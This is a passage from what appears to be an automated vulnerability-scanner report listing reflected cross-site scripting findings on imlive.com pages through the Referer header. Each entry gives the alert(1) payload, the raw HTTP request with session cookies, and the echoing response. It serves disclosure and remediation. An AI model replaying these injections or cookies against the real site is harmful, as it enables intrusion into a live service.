<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8655a'-alert(1)-'b1450d4e902&iy=dallas&id=44&iu=1&vd=66658cff-7513-44e5-b0ab-43cb696f464f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.185. http://fr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: spvdr=vd=a562a319-9a57-49cf-9551-42caa14fd03b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:25 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 21030
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=fr.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=82729'-alert(1)-'0751f493bff&iy=dallas&id=44&iu=1&vd=a562a319-9a57-49cf-9551-42caa14fd03b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.186. http://gr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
Set-Cookie: spvdr=vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:24 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 20541
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=28ad3'-alert(1)-'7c8c16b05d7&iy=dallas&id=44&iu=1&vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.187. http://gr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
Set-Cookie: spvdr=vd=a0b49277-e905-4eb6-a507-32e282c3c02f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:30 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:30 GMT
Connection: close
Content-Length: 253495
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=gr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=81a10'-alert(1)-'0b760eb3fe0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=a0b49277-e905-4eb6-a507-32e282c3c02f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

2.188. http://imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adbd'-alert(1)-'4f9aafda70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=8adbd'-alert(1)-'4f9aafda70b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:46 GMT
Connection: close
Content-Length: 19013
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8adbd'-alert(1)-'4f9aafda70b&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.189. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /GuestDiscountClubs.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c53c'-alert(1)-'71f23548084 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3c53c'-alert(1)-'71f23548084

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:00 GMT
Connection: close
Content-Length: 40625
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.190. http://imlive.com/SiteInformation.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /SiteInformation.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /SiteInformation.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:46 GMT
Connection: close
Content-Length: 28320
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.191. http://imlive.com/awardarena/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 24721
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.192. http://imlive.com/become_celeb.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_celeb.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /become_celeb.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 13435
Vary: Accept-Encoding


<html>
<head>
<title>Celebrity Porn Star Sign Up at ImLive</title>
<meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L
...[SNIP]...
img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.193. http://imlive.com/become_host.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
